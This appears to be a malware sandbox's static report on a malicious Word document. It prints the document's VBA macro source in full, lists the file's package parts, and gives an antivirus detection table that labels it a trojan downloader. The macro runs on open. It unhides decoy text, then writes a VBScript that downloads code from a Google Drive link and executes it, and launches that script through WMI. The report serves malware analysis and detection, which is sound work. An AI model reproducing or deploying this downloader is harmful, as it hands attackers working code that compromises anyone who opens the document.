Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                    

Original


                                        Attribute VB_Name = "NewMacros"
Sub Weed(ns, p)
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect p
    With wnd.Range.InlineShapes(1)
        .Delete
    End With
End Sub

Sub ResContent(pth, cnt)
    Documents.Add
    With ActiveDocument
        .Range.Text = cnt
        .SaveAs2 FileName:=pth, FileFormat:=wdFormatText
        .Close
    End With
End Sub

Sub Present()
    On Error Resume Next
    For Mode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = Mode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

Sub AutoOpen()
    On Error Resume Next
    sn = "utf"
    Set wm = GetObject("winmgmts:win32_process")
    pw = "utf8utf8"
    Weed sn, pw
    Present
    Set wnd = ActiveDocument
    wnd.Save
    cnt = "On Error Resume Next:Set mx = CreateObject(""MSXML2.ServerXMLHTTP""):mx.open ""GET"", ""https://drive.google.com/uc?export=download&id=1SoDzDxjeD9T-yPcpXXI1hWkYpwGq7-00&confirm=t"", False:mx.Send:Execute(mx.responseText)"
    pth = "C:\Users\" & Application.UserName & "\AppData\Roaming\Microsoft\Templates\version.ini"
    ResContent pth, cnt
    wm.Create "wscript.exe //e:vbscript //b " & pth
End Sub


                                    

Deobfuscated


                                        Attribute VB_Name = "NewMacros"
Sub Weed(ns, p)
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect p
    With wnd.Range.InlineShapes(1)
        .Delete
    End With
End Sub

Sub ResContent(pth, cnt)
    Documents.Add
    With ActiveDocument
        .Range.Text = cnt
        .SaveAs2 FileName:=pth, FileFormat:=wdFormatText
        .Close
    End With
End Sub

Sub Present()
    On Error Resume Next
    For Mode = 10 To 0 Step -1
        ActiveWindow.View.SeekView = Mode
        With Selection
            .WholeStory
            .Font.Hidden = False
            .Collapse
        End With
    Next
End Sub

Sub AutoOpen()
    On Error Resume Next
    sn = "utf"
    Set wm = GetObject("winmgmts:win32_process")
    pw = "utf8utf8"
    Weed sn, pw
    Present
    Set wnd = ActiveDocument
    wnd.Save
    cnt = "On Error Resume Next:Set mx = CreateObject(""MSXML2.ServerXMLHTTP""):mx.open ""GET"", ""https://drive.google.com/uc?export=download&id=1SoDzDxjeD9T-yPcpXXI1hWkYpwGq7-00&confirm=t"", False:mx.Send:Execute(mx.responseText)"
    pth = "C:\Users\" & Application.UserName & "\AppData\Roaming\Microsoft\Templates\version.ini"
    ResContent pth, cnt
    wm.Create "wscript.exe //e:vbscript //b " & pth
End Sub


                                    
[Content_Types].xml
_rels/.rels
A$>"f3
word/_rels/document.xml.rels
fye=WE
word/document.xml
Lf2W;_3W
$"9_H%
l'>e8$
&5I-v4
7TbJ&c0Y
k\avy:
:Uj`{~
Q#P(wa
,?O[,F
tiYqpK
0Zn`61a
ir4~Ze^
dnC|kC
bSj*F6!
F\{j)*
word/endnotes.xml
-&C}Hv04
word/footnotes.xml
:#rR{o2J
9i-d{C
word/vbaProject.bin
|<;;+hx
@t/|~L
Yaoqsh
[S#3%[
IP(Oze
y.+92
Q=qFzqe
R|^Q37
8M'\$F:r
SMqlYf
OOX9c^
G7}pl+
>;{'n#\)
9Ic}YW
pXegUB
e$Y+Y2:?
>Yhjd3tm4
ismuMucms]
PRU[USU
@sy]SM5
ye!C{e5x
word/_rels/vbaProject.bin.relsl
1tiJGI
word/theme/theme1.xml
w toc'v
T[XF64
word/vbaData.xml
word/settings.xml
~?'>>r
xh=9o%&
d2_ucf
word/styles.xml
#;t'q#
l[H&Kd
word/numbering.xml
word/fontTable.xml
JA+hH5
8x}<~{
docProps/core.xml
word/webSettings.xml
vjI)6Z
word/stylesWithEffects.xml
L`A\Ic
Wh<~|O8O
B5@16J
cz(%o
X^Q 3EU
docProps/app.xml
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/endnotes.xmlPK
word/footnotes.xmlPK
word/vbaProject.binPK
word/_rels/vbaProject.bin.relsPK
word/theme/theme1.xmlPK
word/vbaData.xmlPK
word/settings.xmlPK
word/styles.xmlPK
word/numbering.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
word/webSettings.xmlPK
word/stylesWithEffects.xmlPK
docProps/app.xmlPK
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.SAgent.4!c
Elastic malicious (high confidence)
MicroWorld-eScan VB:Trojan.Valyria.8028
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
Trustlook Clean
BitDefender VB:Trojan.Valyria.8028
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Office.VBA_Macro_Heur
Cyren ABRisk.ADTI-0
Symantec Trojan.Gen.NPE
ESET-NOD32 VBA/TrojanDownloader.Agent.YWB
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba TrojanDownloader:Office/SAgent.38e77e69
NANO-Antivirus Clean
ViRobot Clean
Tencent Trojan.MsOffice.MacroS.11026129
TACHYON Suspicious/WOX.XSR.Gen
Sophos Clean
F-Secure Trojan.TR/Redcap.sisum
DrWeb Clean
VIPRE VB:Trojan.Valyria.8028
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
FireEye VB:Trojan.Valyria.8028
Emsisoft VB:Trojan.Valyria.8028 (B)
SentinelOne Static AI - Malicious OPENXML
Avast-Mobile Clean
Jiangmin Clean
Google Detected
Avira DR/Redcap.uxgjm
Antiy-AVL Trojan/MSOffice.SAgent.gen
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit HEUR.VBA.CG.2
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSOffice.SAgent.gen
GData VB:Trojan.Valyria.8028
Cynet Malicious (score: 99)
AhnLab-V3 Clean
Acronis suspicious
VBA32 Clean
ALYac Trojan.Downloader.DOC.Gen
MAX malware (ai score=81)
Zoner Clean
Rising Trojan.CodeLoader/VBA!1.DFBF (CLASSIC)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.